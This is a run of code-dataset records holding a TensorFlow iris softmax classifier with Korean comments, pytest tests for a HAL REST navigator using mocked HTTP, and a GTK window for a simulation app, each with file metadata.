원핫인코딩\nsess = tf.Session()\ny_data = tf.one_hot(y_data, depth=3).eval(session=sess)\n# print(y_data.shape) # (150, 3)\ny_data = y_data.reshape(-1, 3)\n\n# 1-2. train_test_split\nx_train, x_test, y_train, y_test = train_test_split(x_data, y_data, random_state=88, train_size=0.8)\n# print(\"x_train, x_test\", x_)\n# print(x_test.shape)\n# print(y_train.shape)\n# print(y_test.shape)\n\n# 1-3. feed_dict에 feed 될 텐서를 위한 placeholder 설정\nx = tf.placeholder(tf.float32, shape=[None, 4])\ny = tf.placeholder(tf.float32, shape=[None, 3])\n\n# 2. 모델 구성\nw = tf.Variable(tf.random_normal([4, 3]), name='weight')\n# y 컬럼이 3개이기 때문에 shape를 3으로 맞춰줘야함\nb = tf.Variable(tf.random_normal([3]), name='bias')\n\n# keras110_9_softmax.py 원그래프 참조. 합쳐서 1이 나오게 변경\nh = tf.nn.softmax(tf.matmul(x, w) + b)\n# print(\"h: \", h)\n# h: Tensor(\"Softmax:0\", shape=(?, 3), dtype=float32)\n\n# 2-1. cost 손실함수(categorical_crossentropy) 정의\nloss = tf.reduce_mean(-tf.reduce_sum(y * tf.log(h), axis=1))\n\n# 2-2. loss를 최소화하는 옵티마이저 정의\nopt = tf.train.GradientDescentOptimizer(learning_rate=2e-2).minimize(loss)\n\n# 3. 
훈련\n# 각 session에 컨텍스트 매니저가 있어서 with 구문 끝에서 자동으로 close()가 호출\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n for step in range(2001):\n _, h_val, cost_val = sess.run([opt, h, loss], feed_dict={x: x_train, y: y_train})\n\n if step % 200 == 0:\n print(step, \"cost_val: \", cost_val)\n # 0 cost_val: 6.311684\n # 200 cost_val: 0.4222794\n # 400 cost_val: 0.34365538\n # 600 cost_val: 0.3002386\n # 800 cost_val: 0.26958433\n # 1000 cost_val: 0.24620421\n # 1200 cost_val: 0.2276606\n # 1400 cost_val: 0.21256508\n # 1600 cost_val: 0.20003031\n # 1800 cost_val: 0.18945326\n # 2000 cost_val: 0.18040702\n\n # tf.argmax(h,1)==h의 1(행)을 기준으로 최대값과 tf.argmax(y,1)==y의 1(행)을 기준으로 최대값이 같은 것을 pred로 지정\n pred = tf.equal(tf.argmax(h, 1), tf.argmax(y, 1))\n\n # pred와 y를 실수형으로 캐스팅해서 차원을 제거한 후 평균으로 acc 구하기\n acc = tf.reduce_mean(tf.cast(pred, dtype=tf.float32))\n print(\"Acc: \", sess.run(acc, feed_dict={x: x_test, y: y_test}))\n", "sub_path": "tf/tf12_iris.py", "file_name": "tf12_iris.py", "file_ext": "py", "file_size_in_byte": 2959, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "tensorflow.compat.v1.disable_v2_behavior", "line_number": 9, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 9, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.compat.v1.disable_eager_execution", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.compat", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1", "line_number": 10, "usage_type": "name"}, {"api_name": "sklearn.datasets.load_iris", "line_number": 12, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.Session", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 20, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.one_hot", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 21, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.placeholder", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 33, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.float32", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.placeholder", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 34, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.float32", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.Variable", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 37, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.random_normal", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.Variable", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 39, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.random_normal", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.nn.softmax", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1", "line_number": 42, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.matmul", "line_number": 42, "usage_type": "call"}, {"api_name": 
"tensorflow.compat.v1.reduce_mean", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 47, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.reduce_sum", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.log", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.train.GradientDescentOptimizer", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.train", "line_number": 50, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1", "line_number": 50, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.Session", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 54, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.global_variables_initializer", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 55, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.equal", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 75, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.argmax", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.reduce_mean", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 78, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.cast", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.float32", "line_number": 78, "usage_type": "attribute"}]} +{"seq_id": "562118955", "text": "'''Refactored tests from test_hal_nav.py'''\n\nimport json\n\nimport httpretty\nimport pytest\n\nimport conftest\n\nimport uritemplate\n\nimport restnavigator as RN\nfrom restnavigator import exc\nimport restnavigator.halnav as HN\n\n\ndef uri_of(doc):\n '''Pull out the url from a hal document'''\n return doc['_links']['self']['href']\n\ndef link_to(doc):\n '''Pull out the self link of a hal document'''\n return doc['_links']['self']\n\n\ndef register_hal_page(doc, **kwargs):\n def body_callback(request, url, headers):\n '''We do a callback so the response body can be updated'''\n return (\n kwargs.get('status', 200),\n kwargs.get('headers', headers),\n json.dumps(doc),\n )\n\n httpretty.HTTPretty.register_uri(\n kwargs.get('method', 'GET'),\n body=body_callback,\n content_type=kwargs.get('content_type', 'application/hal+json'),\n uri=uri_of(doc),\n **kwargs\n )\n\n@pytest.fixture\ndef page(index_page, curie_links, index_uri):\n '''Returns a function that creates pages'''\n def _page(name, number):\n selflink = {\n 'href': index_uri + name + '/' + str(number),\n 'name': name + str(number),\n }\n nextlink = {\n 'href': index_uri + name + '/' + str(number + 1),\n 'name': name + str(number + 1),\n }\n doc = {\n '_links': {\n 'self': selflink,\n 'curies': curie_links,\n 'next': nextlink\n },\n 'name': name,\n 'number': number,\n 'data': conftest.random_sentence(),\n }\n register_hal_page(doc)\n _page.registry.setdefault(name, []).append(doc)\n return doc\n _page.registry = {}\n return _page\n\n\n@pytest.yield_fixture\ndef http(request):\n '''Enables httpretty and disables it after the test'''\n httpretty.HTTPretty.enable()\n yield httpretty.HTTPretty\n httpretty.HTTPretty.disable()\n httpretty.HTTPretty.reset()\n\n\n@pytest.fixture\ndef index_uri():\n '''Fixture for the root uri'''\n return 'http://fakeuri.example/api/'\n\n@pytest.fixture\ndef curie():\n '''Returns the current curie string'''\n return 
conftest.random_word(2).lower()\n\n@pytest.fixture\ndef curify(curie):\n def _curify(rel):\n return curie + ':' + rel\n return _curify\n\n@pytest.fixture\ndef curie_links(curie, index_uri):\n '''Returns a templated curie link'''\n return [{\n 'name': curie,\n 'href': index_uri + 'rels/{rel}',\n 'templated': True,\n }]\n\n@pytest.fixture\ndef index_page(curie_links, index_uri, http):\n '''Registers a basic index page that can be extended'''\n doc = {\n '_links': {\n 'curies': curie_links,\n 'self': {'href': index_uri},\n },\n 'data': conftest.random_paragraphs(),\n }\n register_hal_page(doc)\n return doc\n\n\n@pytest.fixture\ndef N(index_uri, index_page):\n '''A basic HALNavigator with the index_uri as root'''\n return RN.Navigator.hal(index_uri)\n\n\nclass TestTemplateThunk:\n '''tests for halnav.TemplatedThunk'''\n\n @pytest.fixture\n def rel(self, curify, name):\n '''The link relation for the templated link'''\n return curify(name)\n\n @pytest.fixture(params=[set(['x']), set(['x', 'y']), set(['x', 'y', 'z'])])\n def vars(self, request):\n '''A set of random variables'''\n return request.param\n\n @pytest.fixture(params=[(0,0,0), (1,2,3)])\n def values(self, request):\n return dict(zip('xyz', request.param))\n\n @pytest.fixture\n def name(self):\n '''The name of the templated resource'''\n return conftest.random_word(5).lower() + 's'\n\n @pytest.fixture\n def post_template(self, name, index_uri, index_page, rel, vars):\n '''Creates and registers a post templated link'''\n href = \"{index_uri}{name}/{{{varpath}}}\".format(\n index_uri=index_uri,\n name=name,\n varpath='}/{'.join(v for v in sorted(vars))\n )\n link = {\n 'href': href,\n 'title': 'Templated link for ' + name,\n 'templated': True,\n }\n index_page['_links'][rel] = link\n return href\n\n @pytest.fixture\n def tpl_rel(self, name, curify):\n return curify(name + '_tpl')\n\n @pytest.fixture\n def posts(self, rel, name, index_uri, index_page, page, tpl_rel):\n '''Creates and registers some posts'''\n resource0 = page(name, 0)\n index_page['_links'][rel] = link_to(resource0)\n index_page['_links'][tpl_rel] = {\n 'href': index_uri + name + '/{id}',\n 'title': 'Template for ' + name,\n 'templated': True,\n }\n register_hal_page(resource0)\n last = resource0\n for i in range(1, 5):\n resource = page(name, i)\n last['_links']['next'] = link_to(resource)\n last = resource\n register_hal_page(resource)\n return page.registry[name][:]\n\n @pytest.fixture\n def template_thunk(self, rel, index_page, N, post_template):\n return N[rel]\n\n def test_template_uri(self, template_thunk, post_template):\n assert template_thunk.template_uri == post_template\n\n def test_expand_uri(\n self, vars, post_template, template_thunk, values):\n uri = template_thunk.expand_uri(**values)\n assert uri == uritemplate.expand(post_template, values)\n\n def test_expand_link(\n self, vars, post_template, template_thunk, values):\n link = template_thunk.expand_link(**values)\n assert not link.props.get('templated', False)\n assert link.uri == uritemplate.expand(post_template, values)\n\n def test_expand(self, vars, post_template, template_thunk, values):\n post1 = template_thunk(**values)\n assert not post1.fetched\n assert post1.uri == uritemplate.expand(post_template, values)\n\n def test_variables(self, template_thunk, vars):\n assert template_thunk.variables == vars\n\n @pytest.mark.parametrize('i', range(0, 5))\n def test_valid_expansion(self, posts, name, N, tpl_rel, i):\n thunk = N[tpl_rel]\n nav = thunk(id=i)\n nav.fetch()\n assert nav.status == (200, 
'OK')\n assert nav.uri == uri_of(posts[i])\n\n\nclass TestHALNavGetItem:\n '''Tests the __getitem__ method of HALNavigator '''\n\n @pytest.fixture\n def names(self):\n namelist = [conftest.random_word().lower() for _ in range(3)]\n def _names(i):\n return namelist[i]\n return _names\n\n @pytest.fixture\n def rels(self, names, curify):\n def _rels(i):\n return curify(names(i))\n return _rels\n\n @pytest.fixture\n def resources(self, names, rels, index_page, index_uri, page):\n last = index_page\n for i in range(3):\n new = page(names(i), i)\n last['_links'][rels(i)] = {\n 'href': uri_of(new),\n 'title': \"Page for \" + names(i)\n }\n last = new\n\n def test_fetch_behavior(self, N, resources, rels):\n Na = N[rels(0)]\n Nb = N[rels(0), rels(1)]\n assert Na.fetched\n assert not Nb.fetched\n\n def test_sequence_equivalence(self, N, resources, rels):\n Na = N[rels(0), rels(1), rels(2)]\n Nb = N[rels(0)][rels(1)][rels(2)]\n assert Na is Nb\n\n @pytest.fixture\n def link_resources(self, rels, names, index_page, page):\n first = page(names(0), 1)\n index_page['_links'][rels(0)] = link_to(first)\n register_hal_page(first)\n second1 = page(names(1), 1)\n second2 = page(names(1), 2)\n first['_links'][rels(1)] = [\n {\n 'href': uri_of(second1),\n 'name': 'name_x',\n },{\n 'href': uri_of(second2),\n 'name': 'name_y',\n }\n ]\n register_hal_page(second1)\n register_hal_page(second2)\n third_1 = page(names(2), 1)\n third_2 = page(names(2), 2)\n second1['_links'][rels(2)] = link_to(third_1)\n second2['_links'][rels(2)] = link_to(third_2)\n register_hal_page(third_1)\n register_hal_page(third_2)\n\n def test_linklist_in_sequence(self, N, link_resources, rels):\n Nchained = N[rels(0), rels(1), 'name':'name_x', rels(2)]\n Nfirst = N[rels(0)]\n Nsecondlist = Nfirst[rels(1)]\n Nsecond = Nsecondlist.get_by('name', 'name_x')\n Nthird = Nsecond[rels(2)]\n\n assert Nchained is Nthird\n\n def test_linklist_index(self, N, link_resources, rels):\n Nchained = N[rels(0), rels(1), 1, rels(2)]\n Nfirst = N[rels(0)]\n Nsecondlist = Nfirst[rels(1)]\n Nsecond = Nsecondlist[1]\n Nthird = Nsecond[rels(2)]\n assert Nchained is Nthird\n\n def test_bad_rel(self, N, link_resources, rels):\n with pytest.raises(exc.OffTheRailsException):\n N[rels(1)]\n\n with pytest.raises(exc.OffTheRailsException):\n N[rels(0), rels(0)]\n\n def test_bad_name(self, N, link_resources, rels):\n with pytest.raises(exc.OffTheRailsException):\n N[rels(0), rels(1), 'name':'badname']\n\n def test_bad_index(self, N, link_resources, rels):\n with pytest.raises(exc.OffTheRailsException):\n N[rels(0), rels(1), 100]\n\n @pytest.fixture\n def template_uri(self, index_uri):\n return index_uri + 'tpl/{id}'\n\n @pytest.fixture\n def tpl_rel(self, curify):\n return curify('tpl')\n\n @pytest.fixture\n def tpl_resources(self, page, tpl_rel, template_uri, index_page):\n index_page['_links'][tpl_rel] = {\n 'href': template_uri,\n 'templated': True,\n 'title': 'Template link',\n }\n for i in range(3):\n resource = page('tpl', i)\n register_hal_page(resource)\n return template_uri\n\n def test_template_sequence(self, N, tpl_resources, tpl_rel):\n Na = N[tpl_rel](id=0)\n Nb = N[tpl_rel](id=1)\n Nc = N[tpl_rel](id=2)\n Na(), Nb(), Nc()\n assert Na.status == (200, 'OK')\n assert Nb.status == (200, 'OK')\n assert Nc.status == (200, 'OK')\n\n\n@pytest.mark.xfail(reason=\"Embedded not implemented yet\")\nclass TestEmbedded:\n '''tests for embedded document features'''\n\n\n @pytest.fixture\n def blog_posts(self, http):\n '''Posts are both linked and embedded'''\n _posts = 
[self.page('post', x) for x in range(3)]\n for post in _posts:\n register_hal_page(post)\n return _posts\n\n @pytest.fixture\n def comments(self, page):\n '''Comments are embedded only and have no self link'''\n comments = [page('comments', x) for x in range(3)]\n for comment in comments:\n del comment['_links']['self']\n return comments\n\n @pytest.fixture\n def index(self, index_uri, comments, blog_posts, http):\n doc = {\n '_links': {\n 'curies': [{\n 'name': 'xx',\n 'href': index_uri + 'rels/{rel}',\n 'templated': True,\n }],\n 'self': {'href': index_uri},\n 'first': link_to(blog_posts[0]),\n 'xx:second': link_to(blog_posts[1]),\n 'xx:posts': [link_to(post) for post in blog_posts]\n },\n 'data': 'Some data here',\n '_embedded': {\n 'xx:posts': blog_posts,\n 'xx:comments': comments,\n }\n }\n register_hal_page(doc)\n return doc\n\n def test_only_idempotent(self, N, index):\n assert not N['xx:comments'][0].idempotent\n\n def test_length_accurate(self, N, index, comments):\n assert len(N['xx:comments']) == len(comments)\n\n def test_links_and_embedded(self, N, index):\n assert 'xx:comments' in N\n assert 'xx:comments' not in N.links\n assert 'xx:comments' in N.embedded\n assert 'xx:posts' in N\n assert 'xx:posts' in N.links\n assert 'xx:posts' in N.embedded\n", "sub_path": "tests/test_hal_nav2.py", "file_name": "test_hal_nav2.py", "file_ext": "py", "file_size_in_byte": 12068, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}, {"api_name": "httpretty.HTTPretty.register_uri", "line_number": 35, "usage_type": "call"}, {"api_name": "httpretty.HTTPretty", "line_number": 35, "usage_type": "attribute"}, {"api_name": "conftest.random_sentence", "line_number": 63, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 43, "usage_type": "attribute"}, {"api_name": "httpretty.HTTPretty.enable", "line_number": 75, "usage_type": "call"}, {"api_name": "httpretty.HTTPretty", "line_number": 75, "usage_type": "attribute"}, {"api_name": "httpretty.HTTPretty", "line_number": 76, "usage_type": "attribute"}, {"api_name": "httpretty.HTTPretty.disable", "line_number": 77, "usage_type": "call"}, {"api_name": "httpretty.HTTPretty", "line_number": 77, "usage_type": "attribute"}, {"api_name": "httpretty.HTTPretty.reset", "line_number": 78, "usage_type": "call"}, {"api_name": "httpretty.HTTPretty", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pytest.yield_fixture", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 81, "usage_type": "attribute"}, {"api_name": "conftest.random_word", "line_number": 89, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 91, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 97, "usage_type": "attribute"}, {"api_name": "conftest.random_paragraphs", "line_number": 114, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 106, "usage_type": "attribute"}, {"api_name": "restnavigator.Navigator.hal", "line_number": 123, "usage_type": "call"}, {"api_name": "restnavigator.Navigator", "line_number": 123, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 129, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 134, "usage_type": "call"}, 
{"api_name": "pytest.fixture", "line_number": 139, "usage_type": "call"}, {"api_name": "conftest.random_word", "line_number": 146, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 143, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 148, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 164, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 168, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 187, "usage_type": "attribute"}, {"api_name": "uritemplate.expand", "line_number": 197, "usage_type": "call"}, {"api_name": "uritemplate.expand", "line_number": 203, "usage_type": "call"}, {"api_name": "uritemplate.expand", "line_number": 208, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 213, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 213, "usage_type": "attribute"}, {"api_name": "conftest.random_word", "line_number": 227, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 225, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 232, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 238, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 260, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 303, "usage_type": "call"}, {"api_name": "restnavigator.exc.OffTheRailsException", "line_number": 303, "usage_type": "attribute"}, {"api_name": "restnavigator.exc", "line_number": 303, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 306, "usage_type": "call"}, {"api_name": "restnavigator.exc.OffTheRailsException", "line_number": 306, "usage_type": "attribute"}, {"api_name": "restnavigator.exc", "line_number": 306, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 310, "usage_type": "call"}, {"api_name": "restnavigator.exc.OffTheRailsException", "line_number": 310, "usage_type": "attribute"}, {"api_name": "restnavigator.exc", "line_number": 310, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 314, "usage_type": "call"}, {"api_name": "restnavigator.exc.OffTheRailsException", "line_number": 314, "usage_type": "attribute"}, {"api_name": "restnavigator.exc", "line_number": 314, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 317, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 321, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 325, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 352, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 360, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 368, "usage_type": "attribute"}, {"api_name": "pytest.mark.xfail", "line_number": 347, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 347, "usage_type": "attribute"}]} +{"seq_id": "15974386", "text": "\"\"\"Generation app.\"\"\"\nimport gi\ngi.require_version(\"Gtk\", \"3.0\")\nfrom gi.repository import Gtk, GLib\nfrom canvas import Canvas\n\n\nclass DrawingWindow(Gtk.Window):\n\n def __init__(self):\n super(Gtk.Window, self).__init__(title=\"DrawingArea\")\n self.energy = 200\n self.__create_interface()\n\n def __create_interface(self):\n self.maximize()\n self.set_position(Gtk.WindowPosition.CENTER)\n\n box_master = Gtk.Box()\n box_master.set_border_width(5)\n self.add(box_master)\n\n left_box = Gtk.Box()\n 
box_master.pack_start(left_box, True, True, 0)\n\n separator = Gtk.VSeparator()\n box_master.pack_start(separator, False, False, 5)\n\n right_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)\n right_box.set_size_request(150, -1)\n box_master.add(right_box)\n\n separator = Gtk.HSeparator()\n right_box.pack_start(separator, False, True, 10)\n\n execute_button = Gtk.ToggleButton(\"Start\")\n execute_button.set_active(False)\n execute_button.connect(\"toggled\", self.on_execute)\n right_box.pack_start(execute_button, False, True, 0)\n\n separator = Gtk.HSeparator()\n right_box.pack_start(separator, False, True, 10)\n\n label = Gtk.Label(\"Count bots\")\n right_box.pack_start(label, False, True, 0)\n self.count_bots_entry = Gtk.Entry()\n self.count_bots_entry.set_text(str(0))\n self.count_bots_entry.set_editable(False)\n right_box.pack_start(self.count_bots_entry, False, True, 0)\n\n label = Gtk.Label(\"Generation\")\n right_box.pack_start(label, False, True, 0)\n self.generation_entry = Gtk.Entry()\n self.generation_entry.set_text(str(0))\n self.generation_entry.set_editable(False)\n right_box.pack_start(self.generation_entry, False, True, 0)\n\n label = Gtk.Label(\"Mutations\")\n right_box.pack_start(label, False, True, 0)\n self.mutation_entry = Gtk.Entry()\n self.mutation_entry.set_text(str(0))\n self.mutation_entry.set_editable(False)\n right_box.pack_start(self.mutation_entry, False, True, 0)\n\n separator = Gtk.HSeparator()\n right_box.pack_start(separator, False, True, 10)\n\n space = Gtk.Alignment()\n right_box.pack_start(space, True, True, 0)\n\n separator = Gtk.HSeparator()\n right_box.pack_start(separator, False, True, 10)\n\n label = Gtk.Label(\"Energy\")\n right_box.pack_start(label, False, True, 0)\n self.energy_s_button = Gtk.SpinButton()\n adjustment = Gtk.Adjustment(0.0, 0.0, 1000.0, 10.0, 50.0, 0.0)\n self.energy_s_button.set_adjustment(adjustment)\n self.energy_s_button.set_value(self.energy)\n self.energy_s_button.connect(\"changed\", self.on_changed_energy)\n right_box.pack_start(self.energy_s_button, False, True, 0)\n\n separator = Gtk.HSeparator()\n right_box.pack_start(separator, False, True, 10)\n\n button_box = Gtk.ButtonBox()\n right_box.pack_start(button_box, False, True, 0)\n\n separator = Gtk.HSeparator()\n right_box.pack_start(separator, False, True, 10)\n\n self.apply_energy_button = Gtk.Button(\"Apply\")\n self.apply_energy_button.set_sensitive(False)\n self.apply_energy_button.connect(\"clicked\", self.on_apply_energy)\n button_box.add(self.apply_energy_button)\n\n close_button = Gtk.Button(\"Close\")\n close_button.connect(\"clicked\", Gtk.main_quit)\n button_box.add(close_button)\n\n self.scroll_box = Gtk.ScrolledWindow()\n self.scroll_box.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.NEVER)\n left_box.pack_start(self.scroll_box, True, True, 0)\n\n self.canvas = Canvas(\n energy=self.energy\n )\n self.scroll_box.add(self.canvas)\n\n def on_execute(self, button):\n if button.get_active():\n # self.canvas.run()\n # self.__timeout_id = GLib.timeout_add(10, self.on_start, self)\n self.__timeout_id = GLib.timeout_add(100, self.on_start, self)\n button.set_label(\"Stop\")\n else:\n # self.canvas.stop()\n GLib.source_remove(self.__timeout_id)\n del self.__timeout_id\n button.set_label(\"Start\")\n\n def on_changed_energy(self, spin):\n if self.energy == spin.get_value_as_int():\n self.apply_energy_button.set_sensitive(False)\n else:\n self.apply_energy_button.set_sensitive(True)\n\n def on_apply_energy(self, widget):\n self.energy = 
self.energy_s_button.get_value_as_int()\n widget.set_sensitive(False)\n self.canvas.set_data(True)\n\n def on_start(self, widget):\n widget.canvas.queue_draw()\n return True\n", "sub_path": "window.py", "file_name": "window.py", "file_ext": "py", "file_size_in_byte": 4767, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "gi.require_version", "line_number": 3, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 8, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 8, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 11, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 11, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.WindowPosition", "line_number": 17, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 17, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Box", "line_number": 19, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 19, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Box", "line_number": 23, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 23, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.VSeparator", "line_number": 26, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 26, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Box", "line_number": 29, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 29, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Orientation", "line_number": 29, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.HSeparator", "line_number": 33, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 33, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ToggleButton", "line_number": 36, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 36, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.HSeparator", "line_number": 41, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 41, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 44, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 44, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 46, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 46, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 51, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 51, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 53, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 53, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 58, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 58, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 60, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 60, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.HSeparator", "line_number": 65, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 65, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Alignment", "line_number": 68, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 68, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.HSeparator", "line_number": 71, "usage_type": "call"}, {"api_name": 
"gi.repository.Gtk", "line_number": 71, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 74, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 74, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.SpinButton", "line_number": 76, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 76, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Adjustment", "line_number": 77, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 77, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.HSeparator", "line_number": 83, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 83, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ButtonBox", "line_number": 86, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 86, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.HSeparator", "line_number": 89, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 89, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 92, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 92, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 97, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 97, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.main_quit", "line_number": 98, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", 